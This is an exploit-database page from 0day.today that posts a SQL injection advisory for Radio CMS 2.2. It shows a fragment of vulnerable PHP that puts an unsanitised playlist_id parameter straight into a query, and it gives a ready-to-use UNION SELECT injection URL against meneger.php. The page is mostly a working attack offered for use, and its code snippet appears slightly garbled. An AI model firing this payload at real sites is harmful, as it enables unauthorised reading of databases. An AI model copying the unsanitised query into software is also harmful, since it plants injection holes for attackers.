[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Radio CMS 2.2 SQL Injection Vulnerability

Author
Rooster
Risk
[
Security Risk High
]
0day-ID
0day-ID-20607
Category
web applications
Date add
05-04-2013
Platform
php
#################################################
+
+ Title: RadioCMS 2.2
+ Author: Rooster(XEKA)
+ Greetz to: Isis,luz3r,slider
+ Contact: forum.xeksec.com
+
#################################################
 
--[ Vuln Code ] --
 
...
if ($_GET['playlist_id']) {
  $playlist_id_get = ['playlist_id'];
}
...
if ($playlist_id != "") {
$query = "SELECT * FROM `playlist` WHERE $playlist_id;";
...

 
################################################
 
--[ Exploitable ]--
 
http://localhost/radio/meneger.php?fold=/var/www/music&search=1%27&playlist_id=&playlist_id=-1+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12
 
################################################

#  0day.today [2024-11-16]  #